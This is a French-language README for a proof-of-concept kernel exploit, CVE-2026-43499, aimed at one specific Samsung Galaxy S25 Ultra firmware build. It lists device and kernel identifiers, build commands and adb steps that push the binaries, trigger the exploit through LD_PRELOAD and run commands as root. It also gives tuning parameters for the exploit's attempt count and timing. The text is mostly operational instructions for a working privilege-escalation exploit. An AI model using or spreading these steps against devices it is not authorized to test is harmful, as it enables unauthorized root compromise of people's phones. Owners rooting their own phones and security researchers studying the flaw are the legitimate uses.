
PoC autonome CVE-2026-43499 pour Galaxy S25 Ultra SM-S938N S938NKSUACZF1
Preuve de concept spécifique à l'appareil pour CVE-2026-43499 sur le Samsung Galaxy S25 Ultra coréen.
Model: SM-S938N
Codename: pa3q
Android: 16 / API 36
Build: S938NKSUACZF1
Display ID: BP4A.251205.006.S938NKSUACZF1
Fingerprint: samsung/pa3qksx/pa3q:16/BP4A.251205.006/S938NKSUACZF1_OKRACZF1:user/release-keys
Kernel: 6.6.98-android15-8-pd6ff1cd-abogkiS938NKSUACZF1-4k
Architecture: arm64 / 4K pages
Les décalages (offsets) et dispositions des structures ne sont valides que pour le firmware ci-dessus.
Ce port est basé sur :
b850d3bddc74c3328d5fbcc0568d21962b55d949La licence Apache 2.0 amont est conservée dans LICENSE.
pa3q-S938NKSUACZF1.system_unbound_wq spécifique à l'appareil.Définissez ANDROID_NDK_HOME sur Android NDK r29 ou une chaîne d'outils compatible :
make -j8
Sorties :
build/cve-2026-43499
build/cve-2026-43499-root
adb push build/cve-2026-43499 /data/local/tmp/cve-2026-43499
adb push build/cve-2026-43499-root /data/local/tmp/cve-2026-43499-root
adb shell chmod 755 /data/local/tmp/cve-2026-43499 /data/local/tmp/cve-2026-43499-root
adb shell "LD_PRELOAD=/data/local/tmp/cve-2026-43499 /system/bin/true"
adb shell "/data/local/tmp/cve-2026-43499-root -c 'id'"
L'exploit utilise par défaut 16 tentatives indépendantes et un délai pselect de base de 20 000 microsecondes. Remplacez-les lors de la collecte de données de synchronisation :
adb shell "EXPLOIT_ATTEMPTS=24 PSELECT_DELAY_USEC=20000 LD_PRELOAD=/data/local/tmp/cve-2026-43499 /system/bin/true"
La session root temporaire et les allocations conservées durent jusqu'au redémarrage.
Pour une installation en un clic et le support KernelSU, utilisez Root My Galaxy.
Utilisez uniquement sur des appareils dont vous êtes propriétaire ou que vous êtes explicitement autorisé à tester.